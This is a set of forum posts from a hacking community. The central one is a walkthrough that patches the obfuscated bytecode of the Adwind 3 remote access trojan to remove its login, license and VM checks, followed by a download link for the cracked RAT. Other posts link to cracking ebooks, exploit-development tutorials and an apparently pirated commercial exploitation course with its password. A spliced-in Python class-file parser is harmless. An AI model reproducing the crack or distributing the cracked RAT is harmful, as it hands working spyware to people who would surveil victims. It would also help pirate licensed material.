GameHouse.com_tlandn 
Unwrapping_Reflexive_Arcade_EvilInvasion Upack Armadillo 3.70a_VCT5 Various Asprotect Loader Tricks XTM_Arm 4.xx - Standard Protection+Code Splicing+IAT Elimination Yoda's protectors v1.02[MANUAL UNPACKING] Yoda's protectors v1.03.2 beta3[MANUAL UNPACKING] Yoda's protectors v1.03.2[MANUAL UNPACKING] Yoda's protectors v1.03.3[MANUAL UNPACKING] unpack Asprotect 1.2 unpack PECompact 1.68 – 1.84 unpack PECompact 2.x unpack UPX Scramble RC 1.x unpack Yoda Cryptor 1.2

Download Links :
Part 1 : Size 60 MB http://www.4shared.com/rar/-4ImvpF5/rea_unpacking_ebook_-_englishp.html
Part 2 : Size 46 MB http://www.4shared.com/rar/41yeKinn/rea_unpacking_ebook_-_englishp.html

Regards
NO-MERCY
Hello ... RST

Introduction

As the title suggests, this post will feature a practical example of cracking obfuscated Java code, namely Allatori 4.7. For the sake of example I’ve chosen an astonishing Java RAT (Remote ‘Administration’ Tool) worth every one of the $100 it got sold for, but I will come back to this later.

To start, let’s compare the usual workflow of cracking Java programs and then find out why it won’t work for obfuscated code. The ‘usual’ way to crack Java programs is by decompiling, modifying and recompiling the source code. To understand what this means you need to know that Java source code, unlike e.g. C++, doesn’t get directly translated to low-level machine code interpreted by the processor. Instead, it gets distributed in a more abstracted code set called Java bytecode. This code then gets interpreted by a Java Virtual Machine, similar to the .NET Common Language Runtime (CLR), on execution. This offers the ability to distribute programs in a platform-independent format (only the VM needs to get adjusted), but as with everything, it comes with a downside. Since bytecode has such an abstracted, diverse instruction set it turns out to be vulnerable to so-called decompiling, which basically means ‘reversing’ the process of compilation by guessing how the original source code might have looked. Since this is a massive problem of not only application security but also intellectual property there are some efforts to prevent this by obfuscating the code in different ways. One of the results of these efforts is Allatori, a commercial obfuscator starting at $290. It comes with all the features you would expect from a commercial obfuscator, most importantly for us string obfuscation, flow obfuscation and inserting ‘invalid’ bytecode (bytecode ignored by the VM but crashing/confusing known decompilers/deobfuscators).

Adwind 3 – Overview

Adwind 3 is a Java based RAT supporting not only common desktop operating systems but also Android. It originated from a Spanish Proof of Concept called Frutas and recently got rebranded and sold as UNRECOM. It’s protected both by a custom login system with serials and hardware identification. Adwind is using the Swing API to draw its GUI. This means that it defines some user input elements (buttons, text boxes, drop downs..) which offer user-triggered ‘ActionEvents’ (button click..) and connects them to ActionListeners performing the desired action/method. Our first goal is the ‘Login’ button of the window below.

Adwind gets distributed as an executable Java Archive (JAR) containing not only the bytecode in the form of .class files corresponding to the different Java classes but also resources like images and sounds and a Manifest file pointing to the main class function (the one which gets called on execution of the Jar).

Manifest-Version: 1.0
Ant-Version: Apache Ant 1.9.1
Created-By: 1.7.0_25-b17 (Oracle Corporation)
Class-Path: lib/JTattoo-1.6.9.jar
X-COMMENT: Main-Class will be added automatically by build
Main-Class: cliente.Login

When trying to decompile this main class using JD-GUI, we just get an ‘// INTERNAL ERROR //‘ instead of the class functions. Of course we could look for a way to fix this, by hunting down the locations causing them and either patching the decompiler or the class file. But even then, obfuscation techniques like flow obfuscation would result in source code that is not really usable.

Messing with bytecode

Today I want to show you another approach – why go through the whole mess of decompiling and recompiling if we could patch the code directly? There are several bytecode editors to make this easier, my favorite one being dirtyJOE, which is written in C++ and supports Python scripts to perform different manipulations. Since dirtyJOE can’t handle Jars we have to unpack the .class file in question first using any zip utility.
You should really pay attention at this point since zip archives support case-sensitive filenames (for example cG.class, cg.class), but some operating systems like Windows don’t. Since Allatori is utilizing this, it may lead to class files getting overwritten without any notice when unpacking the whole archive to one directory.

dirtyJOE welcomes us with some basic information about the class if available, for example its parent/super-class, the number of constants (constant_pool_count) and methods. Constants are basically all hardcoded references to other functions and strings used by the bytecode. You can find out more about the ClassFile structure here: Bytecode basics | JavaWorld.

If we switch to the ‘Methods’ tab, we directly see the main method – but before digging into it, we should take a short break. Before using any method of a class we need to initialize it to an object, and so does the JVM. In fact, it even needs to initialize the class. This is happening by invoking <init> (object initialization) and <clinit> (class initialization). In our case, nothing spectacular is happening in <clinit>; since the Login class inherits from ‘javax/swing/JFrame’ (User Interface) it initializes the basic Login form and creates the basic form elements:

00000000 : new javax.swing.JComboBox
00000003 : dup
00000004 : invokespecial void javax.swing.JComboBox.<init>()
00000007 : putstatic javax.swing.JComboBox cliente.Login.listalicencias
0000000A : new javax.swing.JPasswordField
0000000D : dup
0000000E : invokespecial void javax.swing.JPasswordField.<init>()
00000011 : putstatic javax.swing.JPasswordField cliente.Login.password
00000014 : new javax.swing.JTextField
00000017 : dup
00000018 : invokespecial void javax.swing.JTextField.<init>()
0000001B : putstatic javax.swing.JTextField cliente.Login.user
0000001E : return

To understand what’s going on, you need a basic understanding of the bytecode instruction set and how it gets interpreted. Going through all of this would exceed the scope of this post, and there are people explaining it way better than I could: Bytecode basics | JavaWorld

This isn’t the button you’re looking for

With the above basics it should be relatively easy to guess what’s going on. Basically, four Swing GUI elements get created, initialized and their references stored in the corresponding fields of the Login class.
javax.swing.JComboBox -> cliente.Login.listalicencias (drop down list of available licenses)
javax.swing.JTextField -> cliente.Login.user (username text-box)
javax.swing.JPasswordField -> cliente.Login.password (masked password text-box)

But hey! Those aren’t all fields, are they? Where are all those buttons, graphics – where is the Login button we’re looking for? Let’s check the <init> method:

00000000 : aconst_null
00000001 : aload_0
00000002 : dup
00000003 : dup_x2
00000004 : aload_0
00000005 : invokespecial void javax.swing.JFrame.<init>()
00000008 : invokespecial void cliente.Login.B()
0000000B : invokespecial void cliente.Login.ALLATORI_DEMO()
0000000E : invokevirtual void cliente.Login.setLocationRelativeTo(java.awt.Component)
00000011 : return

At first glance, this doesn’t look much better, only a single ‘javax.swing’ is in sight. But let’s take a closer look and figure out what’s going on. If you don’t know the meaning of an instruction, you can look it up in Oracle's JVM Instruction Set Reference.

First, null gets pushed on the stack (aconst_null). Then aload_0 gets executed. This loads the first (pos 00) local variable onto the stack, which is always a reference to the object itself, similar to the .this directive in Java. The top value of the stack gets duplicated (dup) and the new top value gets duplicated two values down the stack. Finally, the object reference gets loaded another time.
At this point, the stack should look like this: this, this, this, this, null You could theoretically get the same result by doing 1 aconst_0 and four aload_0 s, but that would be way to simple! Those this references are then used to invokespecial (call) 4 methods and in the end null gets returned – Remember the stack is based on the LIFO (last in, first out) principle. All of those functions are void methods, which means that they don’t return anything to the stack. At this pont, you also see another annoying feature of Allatori, the renaming of foreign methods and classes - B() doesn’t ring any bells, does it? And it gets even worse… If we look for the B() method, we notice that there is not just one, but three of them! This is possible because the JVM allows methods of the same name with different descriptors. Those are the three B() method in question: static synthetic void B(cliente.Login, java.awt.event.ActionEvent) private synthetic void B() private synthetic void B(java.awt.event.ActionEvent) Since we know that no parameters got pushed to the B() method when it was called above we have to look at the second method, void B(). I won’t post all 381 lines but point out some important aspects. 0000004E : new javax.swing.JButton 00000051 : dup 00000052 : invokespecial void javax.swing.JButton.() 00000055 : putfield javax.swing.JButton cliente.Login.g 00000058 : new javax.swing.JPanel Aha! A button. This leads us in the right direction, but since there are multiple buttons and ‘cliente.Login.g’ isn’t telling us much, we need to look for another way to identify it. How about the text of the button shown to the user? It has to get set somewhere, does it? [...] 00000052 : invokespecial void javax.swing.JButton.() 00000055 : putfield javax.swing.JButton cliente.Login.g 00000058 : new javax.swing.JPanel [...] 
00000105 : getfield javax.swing.JButton cliente.Login.g 00000108 : ldc_w " F0@9" 0000010B : invokestatic java.lang.String Extras.MD5.ALLATORI_DEMO(java.lang.String) 0000010E : invokevirtual void javax.swing.JButton.setText(java.lang.String) 00000111 : getfield javax.swing.JButton cliente.Login.g String deobfuscation – the lazy way Well, this part definitively sets some text on the button, and it also loads a string, but the string looks kinda strange, and there is another function in between of the loading of the string (ldc_w ” F0@9? and the text-setting (invokevirtual .setText(java.lang.String) which also takes a string as its parameter. This means that the mysterious ALLATORI_DEMO(String) function probably takes ‘garbage’ as input and returns a more useful string which then gets used to perform whatever operation. In Java, it might look like this: g.setText(Extras.MD5.ALLATORI_DEMO(" F0@9")); This happens for every single usage of strings, only with different methods, which means that we just figured out where strings get deobfuscated. The way Allatori deobfuscates strings got analyzed before, actually it’s pretty simple. The method iterates through the strings characters backwards and performs XOR and AND bit-operations on them – the result gets stored in a array which then gets converted and returned as a string. Due to it’s nature, it’s possible to revert the obfuscation by applying the same method again. However the program which we are looking at is using Allatori 4.7, and here things changed a little. The actual obfuscation is more or less the same, but the key used in it is not simply pushed to the stack but calculated using different stack operations. This, and the fact that Allatori 4.7 uses multiple string obfuscation methods (with different keys) in the same method make it harder to deobfuscate the program by going through all strings automatically. But there is a good message – we don’t even need to get our hands dirty with all of this! 
Since class file functions can easily used in other Java programs and Allatori didn’t bother to include some asymmetric encryption method we can import the class file (or the whole Jar) to a new Java program and call the method like any other to both de- and encrypt strings. System.out.println(Extras.MD5.ALLATORI_DEMO("F0@9")); -> Login System.out.println(Extras.MD5.ALLATORI_DEMO("Login")); -> F0@9 Because some encrypted strings contain line breaks and Java doesn’t support raw strings you might encounter some problems – you can partially fix this by enabling automated escaping when pasting text between string literals in Eclipse (Preferences -> Java -> Editor -> Typing. As we can see thanks to the deobfuscated string, the button text gets indeed set to ‘Login’. Now we just have to find out which EventHandler get’s associated to it. 00000111 : getfield javax.swing.JButton cliente.Login.g 00000114 : new cliente.i 00000117 : dup 00000118 : aload_0 00000119 : invokespecial void cliente.i.(cliente.Login) 0000011C : invokevirtual void javax.swing.JButton.addActionListener(java.awt.event.ActionListener) Here we go. A new instance of class i gets created, initialized and ‘added’ to the JButton as an ActionListener. When the button gets clicked, the instances method ‘ActionPerformed’ gets called… 00000000 : aload_0 00000001 : getfield cliente.Login cliente.i.ALLATORI_DEMO 00000004 : aload_1 00000005 : invokestatic void cliente.Login.ALLATORI_DEMO(cliente.Login, java.awt.event.ActionEvent) 00000008 : return ..which calls ALLATORI_DEMO(cliente.Login, java.awt.event.ActionEvent) in our Login-Class… 00000000 : aload_0 00000001 : aload_1 00000002 : invokespecial void cliente.Login.B(java.awt.event.ActionEvent) 00000005 : return which finally calls cliente.Login.B(ActionEvent). What a ride! 
// check if Username-Textfield is empty 00000000 : getstatic javax.swing.JTextField cliente.Login.user 00000003 : invokevirtual java.lang.String javax.swing.JTextField.getText() 00000006 : invokevirtual boolean java.lang.String.isEmpty() // returns boolean 00000009 : ifeq pos.0000000E // if result is 0 (Field is NOT empty -> jump 0000000C : return // avoid 0000000D : pop // check if Password-Field is empty 0000000E : new java.lang.String // create new string 00000011 : dup 00000012 : getstatic javax.swing.JPasswordField cliente.Login.password 00000015 : invokevirtual char[] javax.swing.JPasswordField.getPassword() 00000018 : invokespecial void java.lang.String.(char[]) 0000001B : invokevirtual boolean java.lang.String.isEmpty() 0000001E : ifeq pos.00000023 00000021 : return // avoid again // check if any license got selected in ComboBox (Index is not -1 / m1 00000022 : iconst_0 00000023 : getstatic javax.swing.JComboBox cliente.Login.listalicencias 00000026 : invokevirtual int javax.swing.JComboBox.getSelectedIndex() 00000029 : iconst_ml 0000002A : if_icmpne pos.0000002E 0000002D : return // meh. 0000002E : aload_0 // // 'hide' the login-window and call Adwind.main(null) -> the main window? 0000002F : invokevirtual void cliente.Login.dispose() 00000032 : aconst_null 00000033 : invokestatic void cliente.Adwind.main(java.lang.String[]) 00000036 : return I already made some comments so it should be pretty clear what’s going on here – some checks if there is any input – but no _real_ checks, no web request. If we patch the return above the main(null)call (triggered by no license being selected) to nop (do nothing / 00), run the program and enter some garbage, the progress calls the main method and then closes. 
This means that the login/license check is not in the Login-class at all but in another castle, somewhere in that / or main() method of Adwind.main Another castle I will cut things down a bit at this point since finding the method isn’t really anything new – after some minutes you should have found an Adwind.B() – call at the top of Adwind.<init> which begins with this lovely VM-Check.. 00000000 : invokestatic boolean Extras.Utils.isVMWARE() 00000003 : ifne pos.0000000C // jump if isVMWARE == 1 00000006 : invokestatic boolean Extras.Utils.isVMWARE() 00000009 : ifeq pos.00000010 // jump if isVMWARE == 0 0000000C : iconst_ml 0000000D : invokestatic void java.lang.System.exit(int) // we don't want to land here ..and also the reason why Adwind closed without any warning when entering wrong credentials: // Store InetAdress "65.99.225.111" in var1 00000033 : ldc_w "0<+7+4" 00000036 : invokestatic java.lang.String cliente.NoIpService.ALLATORI_DEMO(java.lang.String) 00000039 : invokestatic java.net.InetAddress java.net.InetAddress.getByName(java.lang.String) 0000003C : astore_1 // Store InetAdress "adwind.com.mx" -> IP in var 2 0000003D : ldc_w "S(E%\(/]!!J" 00000040 : invokestatic java.lang.String plugins.CargadorPlugins.ALLATORI_DEMO(java.lang.String) 00000043 : invokestatic java.net.InetAddress java.net.InetAddress.getByName(java.lang.String) 00000046 : astore_2 // Load and compare those InetAdresses 00000047 : aload_1 00000048 : aload_2 00000049 : invokevirtual boolean java.net.InetAddress.equals(java.lang.Object) 0000004C : ifeq pos.00000060 // if not equal (If adwind.com.mx doesn't resolve to 65.99.225.111) jump As you can see, the method checks if ‘adwind.com.mx’ resolves to a hardcoded IP adress, probably to detect DNS-manipulation. Since the domain isn’t up anymore, the request will fail, even for valid customers (great!) 
The method also generates a kind of hwid and issues a web request to the login server using a horrible case switch taking about 200 lines, but I will spare you that. Instead, why don’t we just try to nop the invoke of B() in the first place? Since it only checks conditions to exit, this actually works. If we also change the Main-Class in the Jar-manifest, we can even skip the whole login-window. PS: Found this in the Login.main class: 0000000C ldc_w "s9V%F#@5q9W?<^-K[?F" // AuditoryCues.playlist <- Java Swing-Ebook CopyPasta 0000000F invokestatic java.lang.String plugins.CargadorPlugins.ALLATORI_DEMO(java.lang.String) 00000012 ldc_w "h"M>]8[.j"L$6E;h"M>]8[.j"L$" // AuditoryCues.allAuditoryCues <- Srsly? Why I am even cracking this... // initialize java swing UI-Manager in an absolute innovative way 00000015 invokestatic java.lang.String Extras.MD5.ALLATORI_DEMO(java.lang.String) 00000018 invokestatic java.lang.Object javax.swing.UIManager.get(java.lang.Object) 0000001B invokestatic java.lang.Object javax.swing.UIManager.put(java.lang.Object, java.lang.Object) You might wonder what’s the connection of Auditory, a music editor and Adwind, a ‘Premium’RAT. Answer: Complete Copy Pasta. Magic with Merlin: Swinging audio Cracked Version : http://www.mediafire.com/download/bzwv870uovbujci/Adwind3.zip Source : Cracking obfuscated Java Code – Adwind 3 | boredliner Best Regrads NO-MERCY Note : If Any One Have Plugins for this Version pls share it with us Thanks
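An added example, not from the post or the boredliner article: a stand-alone Python script (dirtyJOE's scripting is Python too, but this needs no editor) that parses only the header and the constant pool of a .class file unpacked from the Jar, the 'constants' dirtyJOE counts, and lists every method reference and string literal. That is enough to spot calls like Extras.MD5.ALLATORI_DEMO(String) and the garbage strings fed to them when JD-GUI fails; the class bytes at the bottom are constructed to resemble the Login listing above and are not the real Adwind sample.

```python
"""Constant-pool triage for a Java .class file (added example, not from the post)."""
import struct
import sys

# Fixed-size constant_pool entry layouts (JVM spec 4.4); Utf8 (tag 1) is variable-size.
FIXED_TAGS = {3: ">i", 4: ">f", 5: ">q", 6: ">d", 7: ">H", 8: ">H",
              9: ">HH", 10: ">HH", 11: ">HH", 12: ">HH", 15: ">BH",
              16: ">H", 17: ">HH", 18: ">HH", 19: ">H", 20: ">H"}


def parse_constant_pool(data):
    """Parse only the header and constant pool; return {index: (tag, value)}."""
    magic, _minor, _major, count = struct.unpack_from(">IHHH", data, 0)
    if magic != 0xCAFEBABE:
        raise ValueError("not a class file")
    pool, off, idx = {}, 10, 1          # entries are numbered from 1
    while idx < count:
        tag = data[off]
        off += 1
        if tag == 1:                    # CONSTANT_Utf8: u2 length + modified UTF-8
            (length,) = struct.unpack_from(">H", data, off)
            off += 2
            pool[idx] = (tag, data[off:off + length].decode("utf-8", "replace"))
            off += length
        elif tag in FIXED_TAGS:
            fmt = FIXED_TAGS[tag]
            fields = struct.unpack_from(fmt, data, off)
            off += struct.calcsize(fmt)
            pool[idx] = (tag, fields if len(fields) > 1 else fields[0])
        else:
            raise ValueError("unknown constant tag %d at index %d" % (tag, idx))
        idx += 2 if tag in (5, 6) else 1  # Long and Double occupy two slots
    return pool


def utf8(pool, idx):
    return pool[idx][1]

def class_name(pool, idx):
    return utf8(pool, pool[idx][1])     # CONSTANT_Class -> name_index -> Utf8

def method_refs(pool):
    """'owner.name(descriptor)' for every Methodref / InterfaceMethodref."""
    refs = []
    for tag, value in pool.values():
        if tag in (10, 11):
            cls_idx, nat_idx = value
            name_idx, desc_idx = pool[nat_idx][1]   # CONSTANT_NameAndType
            refs.append("%s.%s%s" % (class_name(pool, cls_idx),
                                     utf8(pool, name_idx), utf8(pool, desc_idx)))
    return sorted(refs)

def string_literals(pool):
    """Every CONSTANT_String, i.e. what ldc / ldc_w can push as a String."""
    return sorted(utf8(pool, value) for tag, value in pool.values() if tag == 8)

def cp_utf8(text):
    """Encode a CONSTANT_Utf8 entry (only used to build the sample below)."""
    raw = text.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(raw)) + raw


# Constructed class-file prefix modelled on the post's Login listing; NOT the
# real Adwind sample.  16 entries, so constant_pool_count is 17.
SAMPLE_CLASS = (
    b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 51, 17)
    + cp_utf8("cliente/Login") + b"\x07" + struct.pack(">H", 1)                 # 1, 2
    + cp_utf8("javax/swing/JButton") + b"\x07" + struct.pack(">H", 3)           # 3, 4
    + cp_utf8("setText") + cp_utf8("(Ljava/lang/String;)V")                    # 5, 6
    + b"\x0c" + struct.pack(">HH", 5, 6) + b"\x0a" + struct.pack(">HH", 4, 7)   # 7, 8
    + cp_utf8(" F0@9") + b"\x08" + struct.pack(">H", 9)                         # 9, 10
    + cp_utf8("Extras/MD5") + b"\x07" + struct.pack(">H", 11)                   # 11, 12
    + cp_utf8("ALLATORI_DEMO") + cp_utf8("(Ljava/lang/String;)Ljava/lang/String;")  # 13, 14
    + b"\x0c" + struct.pack(">HH", 13, 14) + b"\x0a" + struct.pack(">HH", 12, 15)  # 15, 16
)

if __name__ == "__main__":              # pass a .class path, or run on the sample
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CLASS
    cp = parse_constant_pool(blob)
    print("\n".join(["method refs:"] + method_refs(cp) + ["strings:"] + string_literals(cp)))
```

Run it over every .class extracted from the Jar and grep the output for ALLATORI_DEMO to see which deobfuscation method each class uses and which literals it feeds to it.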
-
Reverse Engineering for Beginners
NO-MERCY replied to Usr6's topic in Reverse engineering & exploit development
Special thanks usr6 .. That's very, very good. Greetings -
Hello RST ...

Nish Bhalla, 2005 (Nish[a-t]SecurityCompass.com)
Home » Security Compass

#------------------------------------------------#
Writing Stack Based Overflows on Windows
#------------------------------------------------#

Introduction
-------------
This series focuses on writing stack based overflows for Windows. Before we get into writing exploits, it is important to get some basic concepts cleared up. The first of this multipart article will focus on explaining the basic concepts of how an executable is loaded into memory and executed. The second part will focus on basic assembly instructions. The third part will delve into what stack overflows are, why they exist and how to write exploits for vulnerable applications for a local exploit. Part four will show how to write your own shellcode and how to exploit a remote buffer overflow.

Contents :
----------
Part I – Basic Concepts
Part II - Windows Assembly for writing Exploits
Part III - Stack Overflows
Part IV – Shell Code Creation and Exploiting An Application Remotely

Download : http://www.4shared.com/rar/NH7R1tx3ba/Writing_Stack_Based_Overflows_.html

Best Regards
#----- NO-MERCY -----#
-
Hello RST :

Today I finished the PDFs, with a new "Part 6 : SEH Exploits", with permission from the author.

Windows Exploit Development – Part 1: The Basics
MD5: 395261B0EDFA0FFE9CE9A9DE6BF683FF
Windows Exploit Development – Part 2: Intro to Stack Based Overflows
MD5: AA492D49F1557DCCCE12BE20991044C4
Windows Exploit Development – Part 3: Changing Offset and Rebased Modules
MD5: 545B999CB769FCA63827A2B0509D759E
Windows Exploit Development – Part 4: Locating Shellcode with Jumps
MD5: E2C5B9330A634464A0D2F42104787639
Windows Exploit Development – Part 5: Locating Shellcode with Egghunting
MD5: B6CDF4BA11E5185CAF188FFDECD400F0
Windows Exploit Development – Part 6: SEH Exploits
MD5: 62C712F00E601B38AA83394E5AC95DBE

Next PDFs :
Exploit Development - Fuzzysecurity
Project Shellcode (AIO) Book
The Grey Corner

#------ Best Regards ------#
#------ NO-MERCY ------#
-
Hello RST ...

This book is about "AWE" Advanced Windows Exploitation V1.1, Offensive Security

#----------------------#
Table of Contents
#----------------------#

Module 0x00 Introduction

Module 0x01 Egghunters
  Lab Objectives
  Overview
  Exercise 1-1 MS08-067 Vulnerability
  MS08-067 Case Study: Crashing the Service
  MS08-067 Case Study: Finding the Right Offset
  MS08-067 Case Study: From PoC to Exploit
  Controlling the Execution Flow
  Getting our Remote Shell
  Wrapping Up

Module 0x02 Bypassing NX
  Lab Objectives
  A Note from the Authors
  Overview
  Hardware-Enforcement and the NX Bit
  Hardware-Enforced DEP Bypassing Theory Part I
  Hardware-Enforced DEP Bypassing Theory Part II
  Hardware-Enforced DEP on Windows 2003 Server SP2
  MS08-067 Case Study: Testing NX Protection
  Exercise
  MS08-067 Case Study: Approaching the NX Problem
  MS08-067 Case Study: Memory Space Scanning
  MS08-067 Case Study: Defeating NX
  Exercise
  MS08-067 Case Study: Returning into our Buffer
  Exercise
  Wrapping Up

Module 0x02 (Update) Bypassing DEP AlwaysOn Policy
  Lab Objectives
  Overview
  Ret2Lib Attacks and Their Evolution
  Return Oriented Programming Exploitation
  Immunity Debugger's API and findroppy
  Exercise
  ASLR
  PHP 6.0 Dev Case Study: The Crash
  PHP 6.0 Dev Case Study: The ROP Approach
  PHP 6.0 Dev Case Study: Preparing the Battlefield
  Exercise
  PHP 6.0 Dev Case Study: Crafting the ROP Payload
  Steps 1 and 2
  Steps 3 and 4
  Step 5
  PHP 6.0 Dev Case Study: Getting our Shell
  Exercise
  Deplib: Gadgets on Steroids
  Classification
  Searching the Database
  Stack Pivoting
  Wrapping Up

Module 0x03 Custom Shellcode Creation
  Lab Objectives
  Overview
  System Calls and "The Windows Problem"
  Talking to the Kernel
  Finding kernel32.dll: PEB Method
  Exercise
  Resolving Symbols: Export Directory Table Method
  Working with the Export Names Array
  Computing Function Names Hashes
  Fetching Function's VMA
  MessageBox Shellcode
  Exercise
  Position Independent Shellcode (PIC)
  Exercise
  Shellcode in a Real Exploit
  Exercise
  Wrapping Up

Module 0x04 Venetian Shellcode
  Lab Objectives
  Overview
  The Unicode Problem
  The Venetian Blinds Method
  Exercise
  DivX Player 6.6 Case Study: Crashing the Application
  Exercise
  DivX Player 6.6 Case Study: Controlling the Execution Flow
  Exercise
  DivX Player 6.6 Case Study: The Unicode Payload Builder
  DivX Player 6.6 Case Study: Getting our Shell
  Exercise

Module 0x05 Kernel Drivers Exploitation
  Lab Objectives
  Overview
  Windows I/O System and Device Drivers
  Communicating with drivers
  I/O Control Codes
  Privilege Levels and Ring0 Payloads
  Staging R3 Payloads from Kernel Space
  Case Study Payloads
  Case Study Payload (1): Token Stealing
  Case Study Payload (2): MSR Hooking
  Function Pointer Overwrites
  avast! Case Study: Kernel Memory Corruption
  avast! Case Study: Way Down in ring0 Land
  Exercise
  avast! Case Study: Bypassing Device Driver Checks
  Exercise
  avast! Case Study: EIP Hunting
  Exercise
  avast! Case Study: Elevation (1)
  Exercise
  avast! Case Study: Elevation (2)
  Exercise
  Wrapping up

Module 0x06 64-bit Kernel Driver Exploitation
  Lab Objectives
  Overview
  64-bit Address Space
  64-bit Main Enhancements
  Windows-On-Windows Emulation
  64-bit Exploitation: General Concepts
  MS11-080 Case Study: The Bug
  MS11-080 Case Study: IOCTL Hunting
  MS11-080 Case Study: Triggering the vulnerable code
  Exercise
  MS11-080 Case Study: Mapping your Route
  MS11-080 Case Study: "BSODing" the Box
  Exercise
  MS11-080 Case Study: Owning RIP
  MS11-080 Case Study: You are on your Own Bring me a SYSTEM Shell!

Module 0x07 Heap Spraying
  Lab Objectives
  Overview
  JavaScript Heap Internals Key Points
  Heap Spray: The Technique
  Heap Spray Case Study: CVE-2011-2371 POC
  Exercise
  Heap Spray Case Study: A Deeper Look at the Bug
  Heap Spray Case Study: Mapping the Object in Memory
  Exercise
  Heap Spray Case Study: Controlling the Execution Flow
  Exercise
  Heap Spray Case Study: Stack Pivoting
  Exercise
  Heap Spray Case Study: Pointers Stunts
  Exercise
  Heap Spray Case Study: When 1bit = Shell
  Exercise
  Wrapping Up

Download link : "AWE" Advanced Windows Exploitation V1.1
size : 33 Mb
parts : 4 pdf's
pages : 185
password : NO-MERCY

Best Regards
-
Hello RST ....

This is another one of the Windows Exploit Development tutorial series
FuzzySecurity (2012 \ 2013)
FuzzySecurity | Home

Table of Contents :
=================
Part 1: Introduction to Exploit Development
Part 2: Saved Return Pointer Overflows
Part 3: Structured Exception Handler (SEH)
Part 4: Egg Hunters
Part 5: Unicode 0x00410041
Part 6: Writing W32 shellcode
Part 7: Return Oriented Programming
Part 8: Spraying the Heap [Chapter 1: Vanilla EIP]
Part 9: Spraying the Heap [Chapter 2: Use-After-Free]

Best Regards
NO-MERCY
-
-
Your tutorials, NEOX, are the best, and I am at RST because of that ... If you think about translating them into English after finishing, they will compete with the Corelan tuts and all sites will be talking about that. I know it is hard work and takes a long time .. Appreciate that. A few days ago I found a great paper, but in Spanish, about "Software Exploitation". I'm working to translate it .. it's really good. Sorry for weak English "bad :("
-
Hello RST ...

This is a new series of posts on Windows Exploit Development
Written by: Mike Czumak
Security Sift | Sifting through the world of Information Security, one bit at a time

Special thanks Mike, I appreciate that great work.

Table of Contents :
Windows Exploit Development – Part 1: The Basics
Windows Exploit Development – Part 2: Intro to Stack Based Overflows
Windows Exploit Development – Part 3: Changing Offset and Rebased Modules
Windows Exploit Development – Part 4: Locating Shellcode with Jumps
Windows Exploit Development – Part 5: Locating Shellcode with Egghunting

I'll prepare it as PDFs (soon)

Best Regards
NO-MERCY
-
Hello .... RST

I found a very interesting wiki about "Exploit Dev": references to vulnerability exploitation stuff.
Exploitation - it-sec-catalog - References to vulnerability exploitation stuff. - Gathering references to IT-security related stuff. - Google Project Hosting
SRC => http://code.google.com/p/it-sec-catalog/wiki/Exploitation

Check it out, see u
-
-
Buffer Overflow Inside
NO-MERCY replied to neox's topic in Reverse engineering & exploit development
Thanks for that, Mr. Neox -
Buffer Overflow Inside
NO-MERCY replied to neox's topic in Reverse engineering & exploit development
ha ha .. I like your way in tuts, it's awesome. I saw the same a few weeks ago:
Hacker Course Buffer Overflow - A Practical Example (with Exploit)
Author : Marcelo Carvalho
It's really good.

Examples for your own :- Server-Memcpy & Server-Strcpy
1- http://code.securitytube.net/Server-Memcpy.exe
2- http://code.securitytube.net/Server-Strcpy.exe
src : securitytube.net

Regards

Mr Neox :- some ??? pls
What's the next lesson in your primer "Exploit Dev"?
What's the difference between "DEP" in Win 7 & Win 8?
Thanks ...:) -
Tilon/SpyEye2 intelligence report
NO-MERCY replied to Usr6's topic in Reverse engineering & exploit development
Thanks usr6, I will try to collect it again. Regards